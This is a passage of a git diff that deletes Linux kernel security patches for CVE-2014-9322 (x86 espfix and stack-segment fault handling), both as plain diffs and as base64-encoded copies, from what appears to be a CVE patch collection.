- 		pte_p = (pte_t *)__get_free_page(PGALLOC_GFP);
- 		pmd = __pmd(__pa(pte_p) | (PGTABLE_PROT & ptemask));
--		paravirt_alloc_pmd(&init_mm, __pa(pte_p) >> PAGE_SHIFT);
-+		paravirt_alloc_pte(&init_mm, __pa(pte_p) >> PAGE_SHIFT);
- 		for (n = 0; n < ESPFIX_PMD_CLONES; n++)
- 			set_pmd(&pmd_p[n], pmd);
- 	}
-@@ -193,7 +193,6 @@
- 	pte_p = pte_offset_kernel(&pmd, addr);
- 	stack_page = (void *)__get_free_page(GFP_KERNEL);
- 	pte = __pte(__pa(stack_page) | (__PAGE_KERNEL_RO & ptemask));
--	paravirt_alloc_pte(&init_mm, __pa(stack_page) >> PAGE_SHIFT);
- 	for (n = 0; n < ESPFIX_PTE_CLONES; n++)
- 		set_pte(&pte_p[n*PTE_STRIDE], pte);
- 
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0008.patch.base64 b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0008.patch.base64
deleted file mode 100644
index e39e62e5..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0008.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2FyY2gveDg2L2tlcm5lbC9lc3BmaXhfNjQuYyBiL2FyY2gveDg2L2tlcm5lbC9lc3BmaXhfNjQuYwppbmRleCA2YWZiYjE2Li45NGQ4NTdmIDEwMDY0NAotLS0gYS9hcmNoL3g4Ni9rZXJuZWwvZXNwZml4XzY0LmMKKysrIGIvYXJjaC94ODYva2VybmVsL2VzcGZpeF82NC5jCkBAIC0xNzUsNyArMTc1LDcgQEAKIAlpZiAoIXB1ZF9wcmVzZW50KHB1ZCkpIHsKIAkJcG1kX3AgPSAocG1kX3QgKilfX2dldF9mcmVlX3BhZ2UoUEdBTExPQ19HRlApOwogCQlwdWQgPSBfX3B1ZChfX3BhKHBtZF9wKSB8IChQR1RBQkxFX1BST1QgJiBwdGVtYXNrKSk7Ci0JCXBhcmF2aXJ0X2FsbG9jX3B1ZCgmaW5pdF9tbSwgX19wYShwbWRfcCkgPj4gUEFHRV9TSElGVCk7CisJCXBhcmF2aXJ0X2FsbG9jX3BtZCgmaW5pdF9tbSwgX19wYShwbWRfcCkgPj4gUEFHRV9TSElGVCk7CiAJCWZvciAobiA9IDA7IG4gPCBFU1BGSVhfUFVEX0NMT05FUzsgbisrKQogCQkJc2V0X3B1ZCgmcHVkX3Bbbl0sIHB1ZCk7CiAJfQpAQCAtMTg1LDcgKzE4NSw3IEBACiAJaWYgKCFwbWRfcHJlc2VudChwbWQpKSB7CiAJCXB0ZV9wID0gKHB0ZV90ICopX19nZXRfZnJlZV9wYWdlKFBHQUxMT0NfR0ZQKTsKIAkJcG1kID0gX19wbWQoX19wYShwdGVfcCkgfCAoUEdUQUJMRV9QUk9UICYgcHRlbWFzaykpOwotCQlwYXJhdmlydF9hbGxvY19wbWQoJmluaXRfbW0sIF9fcGEocHRlX3ApID4+IFBBR0VfU0hJRlQpOworCQlwYXJhdmlydF9hbGxvY19wdGUoJmluaXRfbW0sIF9fcGEocHRlX3ApID4+IFBBR0VfU0hJRlQpOwogCQlmb3IgKG4gPSAwOyBuIDwgRVNQRklYX1BNRF9DTE9ORVM7IG4rKykKIAkJCXNldF9wbWQoJnBtZF9wW25dLCBwbWQpOwogCX0KQEAgLTE5Myw3ICsxOTMsNiBAQAogCXB0ZV9wID0gcHRlX29mZnNldF9rZXJuZWwoJnBtZCwgYWRkcik7CiAJc3RhY2tfcGFnZSA9ICh2b2lkICopX19nZXRfZnJlZV9wYWdlKEdGUF9LRVJORUwpOwogCXB0ZSA9IF9fcHRlKF9fcGEoc3RhY2tfcGFnZSkgfCAoX19QQUdFX0tFUk5FTF9STyAmIHB0ZW1hc2spKTsKLQlwYXJhdmlydF9hbGxvY19wdGUoJmluaXRfbW0sIF9fcGEoc3RhY2tfcGFnZSkgPj4gUEFHRV9TSElGVCk7CiAJZm9yIChuID0gMDsgbiA8IEVTUEZJWF9QVEVfQ0xPTkVTOyBuKyspCiAJCXNldF9wdGUoJnB0ZV9wW24qUFRFX1NUUklERV0sIHB0ZSk7CiAK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0009.patch b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0009.patch
deleted file mode 100644
index f655537a..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0009.patch
+++ /dev/null
@@ -1,94 +0,0 @@
-diff --git a/arch/x86/kernel/entry_64.S b/arch/x86/kernel/entry_64.S
-index db230f8..1a454d0 100644
---- a/arch/x86/kernel/entry_64.S
-+++ b/arch/x86/kernel/entry_64.S
-@@ -1068,6 +1068,7 @@
- 	jnz native_irq_return_ldt
- #endif
- 
-+.global native_irq_return_iret
- native_irq_return_iret:
- 	iretq
- 	_ASM_EXTABLE(native_irq_return_iret, bad_iret)
-@@ -1164,37 +1165,6 @@
- 	CFI_ENDPROC
- END(common_interrupt)
- 
--	/*
--	 * If IRET takes a fault on the espfix stack, then we
--	 * end up promoting it to a doublefault.  In that case,
--	 * modify the stack to make it look like we just entered
--	 * the #GP handler from user space, similar to bad_iret.
--	 */
--#ifdef CONFIG_X86_ESPFIX64
--	ALIGN
--__do_double_fault:
--	XCPT_FRAME 1 RDI+8
--	movq RSP(%rdi),%rax		/* Trap on the espfix stack? */
--	sarq $PGDIR_SHIFT,%rax
--	cmpl $ESPFIX_PGD_ENTRY,%eax
--	jne do_double_fault		/* No, just deliver the fault */
--	cmpl $__KERNEL_CS,CS(%rdi)
--	jne do_double_fault
--	movq RIP(%rdi),%rax
--	cmpq $native_irq_return_iret,%rax
--	jne do_double_fault		/* This shouldn't happen... */
--	movq PER_CPU_VAR(kernel_stack),%rax
--	subq $(6*8-KERNEL_STACK_OFFSET),%rax	/* Reset to original stack */
--	movq %rax,RSP(%rdi)
--	movq $0,(%rax)			/* Missing (lost) #GP error code */
--	movq $general_protection,RIP(%rdi)
--	retq
--	CFI_ENDPROC
--END(__do_double_fault)
--#else
--# define __do_double_fault do_double_fault
--#endif
--
- /*
-  * End of kprobes section
-  */
-@@ -1363,7 +1333,7 @@
- zeroentry bounds do_bounds
- zeroentry invalid_op do_invalid_op
- zeroentry device_not_available do_device_not_available
--paranoiderrorentry double_fault __do_double_fault
-+paranoiderrorentry double_fault do_double_fault
- zeroentry coprocessor_segment_overrun do_coprocessor_segment_overrun
- errorentry invalid_TSS do_invalid_TSS
- errorentry segment_not_present do_segment_not_present
-diff --git a/arch/x86/kernel/traps.c b/arch/x86/kernel/traps.c
-index 772e2a8..74e0801 100644
---- a/arch/x86/kernel/traps.c
-+++ b/arch/x86/kernel/traps.c
-@@ -247,6 +247,30 @@
- 	static const char str[] = "double fault";
- 	struct task_struct *tsk = current;
- 
-+#ifdef CONFIG_X86_ESPFIX64
-+	extern unsigned char native_irq_return_iret[];
-+
-+	/*
-+	 * If IRET takes a non-IST fault on the espfix64 stack, then we
-+	 * end up promoting it to a doublefault.  In that case, modify
-+	 * the stack to make it look like we just entered the #GP
-+	 * handler from user space, similar to bad_iret.
-+	 */
-+	if (((long)regs->sp >> PGDIR_SHIFT) == ESPFIX_PGD_ENTRY &&
-+		regs->cs == __KERNEL_CS &&
-+		regs->ip == (unsigned long)native_irq_return_iret)
-+	{
-+		struct pt_regs *normal_regs = task_pt_regs(current);
-+
-+		/* Fake a #GP(0) from userspace. */
-+		memmove(&normal_regs->ip, (void *)regs->sp, 5*8);
-+		normal_regs->orig_ax = 0;  /* Missing (lost) #GP error code */
-+		regs->ip = (unsigned long)general_protection;
-+		regs->sp = (unsigned long)&normal_regs->orig_ax;
-+		return;
-+	}
-+#endif
-+
- 	exception_enter();
- 	/* Return not checked because double check cannot be ignored */
- 	notify_die(DIE_TRAP, str, regs, error_code, X86_TRAP_DF, SIGSEGV);
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0009.patch.base64 b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0009.patch.base64
deleted file mode 100644
index 59821700..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0009.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2FyY2gveDg2L2tlcm5lbC9lbnRyeV82NC5TIGIvYXJjaC94ODYva2VybmVsL2VudHJ5XzY0LlMKaW5kZXggZGIyMzBmOC4uMWE0NTRkMCAxMDA2NDQKLS0tIGEvYXJjaC94ODYva2VybmVsL2VudHJ5XzY0LlMKKysrIGIvYXJjaC94ODYva2VybmVsL2VudHJ5XzY0LlMKQEAgLTEwNjgsNiArMTA2OCw3IEBACiAJam56IG5hdGl2ZV9pcnFfcmV0dXJuX2xkdAogI2VuZGlmCiAKKy5nbG9iYWwgbmF0aXZlX2lycV9yZXR1cm5faXJldAogbmF0aXZlX2lycV9yZXR1cm5faXJldDoKIAlpcmV0cQogCV9BU01fRVhUQUJMRShuYXRpdmVfaXJxX3JldHVybl9pcmV0LCBiYWRfaXJldCkKQEAgLTExNjQsMzcgKzExNjUsNiBAQAogCUNGSV9FTkRQUk9DCiBFTkQoY29tbW9uX2ludGVycnVwdCkKIAotCS8qCi0JICogSWYgSVJFVCB0YWtlcyBhIGZhdWx0IG9uIHRoZSBlc3BmaXggc3RhY2ssIHRoZW4gd2UKLQkgKiBlbmQgdXAgcHJvbW90aW5nIGl0IHRvIGEgZG91YmxlZmF1bHQuICBJbiB0aGF0IGNhc2UsCi0JICogbW9kaWZ5IHRoZSBzdGFjayB0byBtYWtlIGl0IGxvb2sgbGlrZSB3ZSBqdXN0IGVudGVyZWQKLQkgKiB0aGUgI0dQIGhhbmRsZXIgZnJvbSB1c2VyIHNwYWNlLCBzaW1pbGFyIHRvIGJhZF9pcmV0LgotCSAqLwotI2lmZGVmIENPTkZJR19YODZfRVNQRklYNjQKLQlBTElHTgotX19kb19kb3VibGVfZmF1bHQ6Ci0JWENQVF9GUkFNRSAxIFJESSs4Ci0JbW92cSBSU1AoJXJkaSksJXJheAkJLyogVHJhcCBvbiB0aGUgZXNwZml4IHN0YWNrPyAqLwotCXNhcnEgJFBHRElSX1NISUZULCVyYXgKLQljbXBsICRFU1BGSVhfUEdEX0VOVFJZLCVlYXgKLQlqbmUgZG9fZG91YmxlX2ZhdWx0CQkvKiBObywganVzdCBkZWxpdmVyIHRoZSBmYXVsdCAqLwotCWNtcGwgJF9fS0VSTkVMX0NTLENTKCVyZGkpCi0Jam5lIGRvX2RvdWJsZV9mYXVsdAotCW1vdnEgUklQKCVyZGkpLCVyYXgKLQljbXBxICRuYXRpdmVfaXJxX3JldHVybl9pcmV0LCVyYXgKLQlqbmUgZG9fZG91YmxlX2ZhdWx0CQkvKiBUaGlzIHNob3VsZG4ndCBoYXBwZW4uLi4gKi8KLQltb3ZxIFBFUl9DUFVfVkFSKGtlcm5lbF9zdGFjayksJXJheAotCXN1YnEgJCg2KjgtS0VSTkVMX1NUQUNLX09GRlNFVCksJXJheAkvKiBSZXNldCB0byBvcmlnaW5hbCBzdGFjayAqLwotCW1vdnEgJXJheCxSU1AoJXJkaSkKLQltb3ZxICQwLCglcmF4KQkJCS8qIE1pc3NpbmcgKGxvc3QpICNHUCBlcnJvciBjb2RlICovCi0JbW92cSAkZ2VuZXJhbF9wcm90ZWN0aW9uLFJJUCglcmRpKQotCXJldHEKLQlDRklfRU5EUFJPQwotRU5EKF9fZG9fZG91YmxlX2ZhdWx0KQotI2Vsc2UKLSMgZGVmaW5lIF9fZG9fZG91YmxlX2ZhdWx0IGRvX2RvdWJsZV9mYXVsdAotI2VuZGlmCi0KIC8qCiAgKiBFbmQgb2Yga3Byb2JlcyBzZWN0aW9uCiAgKi8KQEAgLTEzNjMsNyArMTMzMyw3IEBACiB6ZXJvZW50cnkgYm91bmRzIGRvX2JvdW5kcwogemVyb2VudHJ5IGludmFsaWRfb3AgZG9faW52YWxpZF9vcAogemVyb2VudHJ5IGRldmljZV9ub3RfYXZhaWxhYmxlIGRvX2RldmljZV9ub3RfYXZhaWxhYmxlCi1wYXJhbm9pZGVycm9yZW50cnkgZG91YmxlX2ZhdWx0IF9fZG9fZG91YmxlX2ZhdWx0CitwYXJhbm9pZGVycm9yZW50cnkgZG91YmxlX2ZhdWx0IGRvX2RvdWJsZV9mYXVsdAogemVyb2VudHJ5IGNvcHJvY2Vzc29yX3NlZ21lbnRfb3ZlcnJ1biBkb19jb3Byb2Nlc3Nvcl9zZWdtZW50X292ZXJydW4KIGVycm9yZW50cnkgaW52YWxpZF9UU1MgZG9faW52YWxpZF9UU1MKIGVycm9yZW50cnkgc2VnbWVudF9ub3RfcHJlc2VudCBkb19zZWdtZW50X25vdF9wcmVzZW50CmRpZmYgLS1naXQgYS9hcmNoL3g4Ni9rZXJuZWwvdHJhcHMuYyBiL2FyY2gveDg2L2tlcm5lbC90cmFwcy5jCmluZGV4IDc3MmUyYTguLjc0ZTA4MDEgMTAwNjQ0Ci0tLSBhL2FyY2gveDg2L2tlcm5lbC90cmFwcy5jCisrKyBiL2FyY2gveDg2L2tlcm5lbC90cmFwcy5jCkBAIC0yNDcsNiArMjQ3LDMwIEBACiAJc3RhdGljIGNvbnN0IGNoYXIgc3RyW10gPSAiZG91YmxlIGZhdWx0IjsKIAlzdHJ1Y3QgdGFza19zdHJ1Y3QgKnRzayA9IGN1cnJlbnQ7CiAKKyNpZmRlZiBDT05GSUdfWDg2X0VTUEZJWDY0CisJZXh0ZXJuIHVuc2lnbmVkIGNoYXIgbmF0aXZlX2lycV9yZXR1cm5faXJldFtdOworCisJLyoKKwkgKiBJZiBJUkVUIHRha2VzIGEgbm9uLUlTVCBmYXVsdCBvbiB0aGUgZXNwZml4NjQgc3RhY2ssIHRoZW4gd2UKKwkgKiBlbmQgdXAgcHJvbW90aW5nIGl0IHRvIGEgZG91YmxlZmF1bHQuICBJbiB0aGF0IGNhc2UsIG1vZGlmeQorCSAqIHRoZSBzdGFjayB0byBtYWtlIGl0IGxvb2sgbGlrZSB3ZSBqdXN0IGVudGVyZWQgdGhlICNHUAorCSAqIGhhbmRsZXIgZnJvbSB1c2VyIHNwYWNlLCBzaW1pbGFyIHRvIGJhZF9pcmV0LgorCSAqLworCWlmICgoKGxvbmcpcmVncy0+c3AgPj4gUEdESVJfU0hJRlQpID09IEVTUEZJWF9QR0RfRU5UUlkgJiYKKwkJcmVncy0+Y3MgPT0gX19LRVJORUxfQ1MgJiYKKwkJcmVncy0+aXAgPT0gKHVuc2lnbmVkIGxvbmcpbmF0aXZlX2lycV9yZXR1cm5faXJldCkKKwl7CisJCXN0cnVjdCBwdF9yZWdzICpub3JtYWxfcmVncyA9IHRhc2tfcHRfcmVncyhjdXJyZW50KTsKKworCQkvKiBGYWtlIGEgI0dQKDApIGZyb20gdXNlcnNwYWNlLiAqLworCQltZW1tb3ZlKCZub3JtYWxfcmVncy0+aXAsICh2b2lkICopcmVncy0+c3AsIDUqOCk7CisJCW5vcm1hbF9yZWdzLT5vcmlnX2F4ID0gMDsgIC8qIE1pc3NpbmcgKGxvc3QpICNHUCBlcnJvciBjb2RlICovCisJCXJlZ3MtPmlwID0gKHVuc2lnbmVkIGxvbmcpZ2VuZXJhbF9wcm90ZWN0aW9uOworCQlyZWdzLT5zcCA9ICh1bnNpZ25lZCBsb25nKSZub3JtYWxfcmVncy0+b3JpZ19heDsKKwkJcmV0dXJuOworCX0KKyNlbmRpZgorCiAJZXhjZXB0aW9uX2VudGVyKCk7CiAJLyogUmV0dXJuIG5vdCBjaGVja2VkIGJlY2F1c2UgZG91YmxlIGNoZWNrIGNhbm5vdCBiZSBpZ25vcmVkICovCiAJbm90aWZ5X2RpZShESUVfVFJBUCwgc3RyLCByZWdzLCBlcnJvcl9jb2RlLCBYODZfVFJBUF9ERiwgU0lHU0VHVik7Cg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0010.patch b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0010.patch
deleted file mode 100644
index 3214fe2e..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0010.patch
+++ /dev/null
@@ -1,101 +0,0 @@
-diff --git a/arch/x86/include/asm/page_32_types.h b/arch/x86/include/asm/page_32_types.h
-index ef17af0..4376b45 100644
---- a/arch/x86/include/asm/page_32_types.h
-+++ b/arch/x86/include/asm/page_32_types.h
-@@ -18,7 +18,6 @@
- #define THREAD_SIZE_ORDER	1
- #define THREAD_SIZE		(PAGE_SIZE << THREAD_SIZE_ORDER)
- 
--#define STACKFAULT_STACK 0
- #define DOUBLEFAULT_STACK 1
- #define NMI_STACK 0
- #define DEBUG_STACK 0
-diff --git a/arch/x86/include/asm/page_64_types.h b/arch/x86/include/asm/page_64_types.h
-index 6c896fb..970f309 100644
---- a/arch/x86/include/asm/page_64_types.h
-+++ b/arch/x86/include/asm/page_64_types.h
-@@ -14,12 +14,11 @@
- #define IRQ_STACK_ORDER 2
- #define IRQ_STACK_SIZE (PAGE_SIZE << IRQ_STACK_ORDER)
- 
--#define STACKFAULT_STACK 1
--#define DOUBLEFAULT_STACK 2
--#define NMI_STACK 3
--#define DEBUG_STACK 4
--#define MCE_STACK 5
--#define N_EXCEPTION_STACKS 5  /* hw limit: 7 */
-+#define DOUBLEFAULT_STACK 1
-+#define NMI_STACK 2
-+#define DEBUG_STACK 3
-+#define MCE_STACK 4
-+#define N_EXCEPTION_STACKS 4  /* hw limit: 7 */
- 
- #define PUD_PAGE_SIZE		(_AC(1, UL) << PUD_SHIFT)
- #define PUD_PAGE_MASK		(~(PUD_PAGE_SIZE-1))
-diff --git a/arch/x86/kernel/dumpstack_64.c b/arch/x86/kernel/dumpstack_64.c
-index addb207..66e274a 100644
---- a/arch/x86/kernel/dumpstack_64.c
-+++ b/arch/x86/kernel/dumpstack_64.c
-@@ -24,7 +24,6 @@
- 		[ DEBUG_STACK-1			]	= "#DB",
- 		[ NMI_STACK-1			]	= "NMI",
- 		[ DOUBLEFAULT_STACK-1		]	= "#DF",
--		[ STACKFAULT_STACK-1		]	= "#SS",
- 		[ MCE_STACK-1			]	= "#MC",
- #if DEBUG_STKSZ > EXCEPTION_STKSZ
- 		[ N_EXCEPTION_STACKS ...
-diff --git a/arch/x86/kernel/entry_64.S b/arch/x86/kernel/entry_64.S
-index 1a454d0..50e5e59 100644
---- a/arch/x86/kernel/entry_64.S
-+++ b/arch/x86/kernel/entry_64.S
-@@ -1503,7 +1503,7 @@
- 
- paranoidzeroentry_ist debug do_debug DEBUG_STACK
- paranoidzeroentry_ist int3 do_int3 DEBUG_STACK
--paranoiderrorentry stack_segment do_stack_segment
-+errorentry stack_segment do_stack_segment
- #ifdef CONFIG_XEN
- zeroentry xen_debug do_debug
- zeroentry xen_int3 do_int3
-diff --git a/arch/x86/kernel/traps.c b/arch/x86/kernel/traps.c
-index 74e0801..00a2873 100644
---- a/arch/x86/kernel/traps.c
-+++ b/arch/x86/kernel/traps.c
-@@ -220,28 +220,12 @@
- 		coprocessor_segment_overrun)
- DO_ERROR(X86_TRAP_TS, SIGSEGV, "invalid TSS", invalid_TSS)
- DO_ERROR(X86_TRAP_NP, SIGBUS, "segment not present", segment_not_present)
--#ifdef CONFIG_X86_32
- DO_ERROR(X86_TRAP_SS, SIGBUS, "stack segment", stack_segment)
--#endif
- DO_ERROR_INFO(X86_TRAP_AC, SIGBUS, "alignment check", alignment_check,
- 		BUS_ADRALN, 0)
- 
- #ifdef CONFIG_X86_64
- /* Runs on IST stack */
--dotraplinkage void do_stack_segment(struct pt_regs *regs, long error_code)
--{
--	enum ctx_state prev_state;
--
--	prev_state = exception_enter();
--	if (notify_die(DIE_TRAP, "stack segment", regs, error_code,
--		       X86_TRAP_SS, SIGBUS) != NOTIFY_STOP) {
--		preempt_conditional_sti(regs);
--		do_trap(X86_TRAP_SS, SIGBUS, "stack segment", regs, error_code, NULL);
--		preempt_conditional_cli(regs);
--	}
--	exception_exit(prev_state);
--}
--
- dotraplinkage void do_double_fault(struct pt_regs *regs, long error_code)
- {
- 	static const char str[] = "double fault";
-@@ -769,7 +753,7 @@
- 	set_intr_gate(X86_TRAP_OLD_MF, &coprocessor_segment_overrun);
- 	set_intr_gate(X86_TRAP_TS, &invalid_TSS);
- 	set_intr_gate(X86_TRAP_NP, &segment_not_present);
--	set_intr_gate_ist(X86_TRAP_SS, &stack_segment, STACKFAULT_STACK);
-+	set_intr_gate(X86_TRAP_SS, stack_segment);
- 	set_intr_gate(X86_TRAP_GP, &general_protection);
- 	set_intr_gate(X86_TRAP_SPURIOUS, &spurious_interrupt_bug);
- 	set_intr_gate(X86_TRAP_MF, &coprocessor_error);
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0010.patch.base64 b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0010.patch.base64
deleted file mode 100644
index ac00d8ff..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0010.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2FyY2gveDg2L2luY2x1ZGUvYXNtL3BhZ2VfMzJfdHlwZXMuaCBiL2FyY2gveDg2L2luY2x1ZGUvYXNtL3BhZ2VfMzJfdHlwZXMuaAppbmRleCBlZjE3YWYwLi40Mzc2YjQ1IDEwMDY0NAotLS0gYS9hcmNoL3g4Ni9pbmNsdWRlL2FzbS9wYWdlXzMyX3R5cGVzLmgKKysrIGIvYXJjaC94ODYvaW5jbHVkZS9hc20vcGFnZV8zMl90eXBlcy5oCkBAIC0xOCw3ICsxOCw2IEBACiAjZGVmaW5lIFRIUkVBRF9TSVpFX09SREVSCTEKICNkZWZpbmUgVEhSRUFEX1NJWkUJCShQQUdFX1NJWkUgPDwgVEhSRUFEX1NJWkVfT1JERVIpCiAKLSNkZWZpbmUgU1RBQ0tGQVVMVF9TVEFDSyAwCiAjZGVmaW5lIERPVUJMRUZBVUxUX1NUQUNLIDEKICNkZWZpbmUgTk1JX1NUQUNLIDAKICNkZWZpbmUgREVCVUdfU1RBQ0sgMApkaWZmIC0tZ2l0IGEvYXJjaC94ODYvaW5jbHVkZS9hc20vcGFnZV82NF90eXBlcy5oIGIvYXJjaC94ODYvaW5jbHVkZS9hc20vcGFnZV82NF90eXBlcy5oCmluZGV4IDZjODk2ZmIuLjk3MGYzMDkgMTAwNjQ0Ci0tLSBhL2FyY2gveDg2L2luY2x1ZGUvYXNtL3BhZ2VfNjRfdHlwZXMuaAorKysgYi9hcmNoL3g4Ni9pbmNsdWRlL2FzbS9wYWdlXzY0X3R5cGVzLmgKQEAgLTE0LDEyICsxNCwxMSBAQAogI2RlZmluZSBJUlFfU1RBQ0tfT1JERVIgMgogI2RlZmluZSBJUlFfU1RBQ0tfU0laRSAoUEFHRV9TSVpFIDw8IElSUV9TVEFDS19PUkRFUikKIAotI2RlZmluZSBTVEFDS0ZBVUxUX1NUQUNLIDEKLSNkZWZpbmUgRE9VQkxFRkFVTFRfU1RBQ0sgMgotI2RlZmluZSBOTUlfU1RBQ0sgMwotI2RlZmluZSBERUJVR19TVEFDSyA0Ci0jZGVmaW5lIE1DRV9TVEFDSyA1Ci0jZGVmaW5lIE5fRVhDRVBUSU9OX1NUQUNLUyA1ICAvKiBodyBsaW1pdDogNyAqLworI2RlZmluZSBET1VCTEVGQVVMVF9TVEFDSyAxCisjZGVmaW5lIE5NSV9TVEFDSyAyCisjZGVmaW5lIERFQlVHX1NUQUNLIDMKKyNkZWZpbmUgTUNFX1NUQUNLIDQKKyNkZWZpbmUgTl9FWENFUFRJT05fU1RBQ0tTIDQgIC8qIGh3IGxpbWl0OiA3ICovCiAKICNkZWZpbmUgUFVEX1BBR0VfU0laRQkJKF9BQygxLCBVTCkgPDwgUFVEX1NISUZUKQogI2RlZmluZSBQVURfUEFHRV9NQVNLCQkofihQVURfUEFHRV9TSVpFLTEpKQpkaWZmIC0tZ2l0IGEvYXJjaC94ODYva2VybmVsL2R1bXBzdGFja182NC5jIGIvYXJjaC94ODYva2VybmVsL2R1bXBzdGFja182NC5jCmluZGV4IGFkZGIyMDcuLjY2ZTI3NGEgMTAwNjQ0Ci0tLSBhL2FyY2gveDg2L2tlcm5lbC9kdW1wc3RhY2tfNjQuYworKysgYi9hcmNoL3g4Ni9rZXJuZWwvZHVtcHN0YWNrXzY0LmMKQEAgLTI0LDcgKzI0LDYgQEAKIAkJWyBERUJVR19TVEFDSy0xCQkJXQk9ICIjREIiLAogCQlbIE5NSV9TVEFDSy0xCQkJXQk9ICJOTUkiLAogCQlbIERPVUJMRUZBVUxUX1NUQUNLLTEJCV0JPSAiI0RGIiwKLQkJWyBTVEFDS0ZBVUxUX1NUQUNLLTEJCV0JPSAiI1NTIiwKIAkJWyBNQ0VfU1RBQ0stMQkJCV0JPSAiI01DIiwKICNpZiBERUJVR19TVEtTWiA+IEVYQ0VQVElPTl9TVEtTWgogCQlbIE5fRVhDRVBUSU9OX1NUQUNLUyAuLi4KZGlmZiAtLWdpdCBhL2FyY2gveDg2L2tlcm5lbC9lbnRyeV82NC5TIGIvYXJjaC94ODYva2VybmVsL2VudHJ5XzY0LlMKaW5kZXggMWE0NTRkMC4uNTBlNWU1OSAxMDA2NDQKLS0tIGEvYXJjaC94ODYva2VybmVsL2VudHJ5XzY0LlMKKysrIGIvYXJjaC94ODYva2VybmVsL2VudHJ5XzY0LlMKQEAgLTE1MDMsNyArMTUwMyw3IEBACiAKIHBhcmFub2lkemVyb2VudHJ5X2lzdCBkZWJ1ZyBkb19kZWJ1ZyBERUJVR19TVEFDSwogcGFyYW5vaWR6ZXJvZW50cnlfaXN0IGludDMgZG9faW50MyBERUJVR19TVEFDSwotcGFyYW5vaWRlcnJvcmVudHJ5IHN0YWNrX3NlZ21lbnQgZG9fc3RhY2tfc2VnbWVudAorZXJyb3JlbnRyeSBzdGFja19zZWdtZW50IGRvX3N0YWNrX3NlZ21lbnQKICNpZmRlZiBDT05GSUdfWEVOCiB6ZXJvZW50cnkgeGVuX2RlYnVnIGRvX2RlYnVnCiB6ZXJvZW50cnkgeGVuX2ludDMgZG9faW50MwpkaWZmIC0tZ2l0IGEvYXJjaC94ODYva2VybmVsL3RyYXBzLmMgYi9hcmNoL3g4Ni9rZXJuZWwvdHJhcHMuYwppbmRleCA3NGUwODAxLi4wMGEyODczIDEwMDY0NAotLS0gYS9hcmNoL3g4Ni9rZXJuZWwvdHJhcHMuYworKysgYi9hcmNoL3g4Ni9rZXJuZWwvdHJhcHMuYwpAQCAtMjIwLDI4ICsyMjAsMTIgQEAKIAkJY29wcm9jZXNzb3Jfc2VnbWVudF9vdmVycnVuKQogRE9fRVJST1IoWDg2X1RSQVBfVFMsIFNJR1NFR1YsICJpbnZhbGlkIFRTUyIsIGludmFsaWRfVFNTKQogRE9fRVJST1IoWDg2X1RSQVBfTlAsIFNJR0JVUywgInNlZ21lbnQgbm90IHByZXNlbnQiLCBzZWdtZW50X25vdF9wcmVzZW50KQotI2lmZGVmIENPTkZJR19YODZfMzIKIERPX0VSUk9SKFg4Nl9UUkFQX1NTLCBTSUdCVVMsICJzdGFjayBzZWdtZW50Iiwgc3RhY2tfc2VnbWVudCkKLSNlbmRpZgogRE9fRVJST1JfSU5GTyhYODZfVFJBUF9BQywgU0lHQlVTLCAiYWxpZ25tZW50IGNoZWNrIiwgYWxpZ25tZW50X2NoZWNrLAogCQlCVVNfQURSQUxOLCAwKQogCiAjaWZkZWYgQ09ORklHX1g4Nl82NAogLyogUnVucyBvbiBJU1Qgc3RhY2sgKi8KLWRvdHJhcGxpbmthZ2Ugdm9pZCBkb19zdGFja19zZWdtZW50KHN0cnVjdCBwdF9yZWdzICpyZWdzLCBsb25nIGVycm9yX2NvZGUpCi17Ci0JZW51bSBjdHhfc3RhdGUgcHJldl9zdGF0ZTsKLQotCXByZXZfc3RhdGUgPSBleGNlcHRpb25fZW50ZXIoKTsKLQlpZiAobm90aWZ5X2RpZShESUVfVFJBUCwgInN0YWNrIHNlZ21lbnQiLCByZWdzLCBlcnJvcl9jb2RlLAotCQkgICAgICAgWDg2X1RSQVBfU1MsIFNJR0JVUykgIT0gTk9USUZZX1NUT1ApIHsKLQkJcHJlZW1wdF9jb25kaXRpb25hbF9zdGkocmVncyk7Ci0JCWRvX3RyYXAoWDg2X1RSQVBfU1MsIFNJR0JVUywgInN0YWNrIHNlZ21lbnQiLCByZWdzLCBlcnJvcl9jb2RlLCBOVUxMKTsKLQkJcHJlZW1wdF9jb25kaXRpb25hbF9jbGkocmVncyk7Ci0JfQotCWV4Y2VwdGlvbl9leGl0KHByZXZfc3RhdGUpOwotfQotCiBkb3RyYXBsaW5rYWdlIHZvaWQgZG9fZG91YmxlX2ZhdWx0KHN0cnVjdCBwdF9yZWdzICpyZWdzLCBsb25nIGVycm9yX2NvZGUpCiB7CiAJc3RhdGljIGNvbnN0IGNoYXIgc3RyW10gPSAiZG91YmxlIGZhdWx0IjsKQEAgLTc2OSw3ICs3NTMsNyBAQAogCXNldF9pbnRyX2dhdGUoWDg2X1RSQVBfT0xEX01GLCAmY29wcm9jZXNzb3Jfc2VnbWVudF9vdmVycnVuKTsKIAlzZXRfaW50cl9nYXRlKFg4Nl9UUkFQX1RTLCAmaW52YWxpZF9UU1MpOwogCXNldF9pbnRyX2dhdGUoWDg2X1RSQVBfTlAsICZzZWdtZW50X25vdF9wcmVzZW50KTsKLQlzZXRfaW50cl9nYXRlX2lzdChYODZfVFJBUF9TUywgJnN0YWNrX3NlZ21lbnQsIFNUQUNLRkFVTFRfU1RBQ0spOworCXNldF9pbnRyX2dhdGUoWDg2X1RSQVBfU1MsIHN0YWNrX3N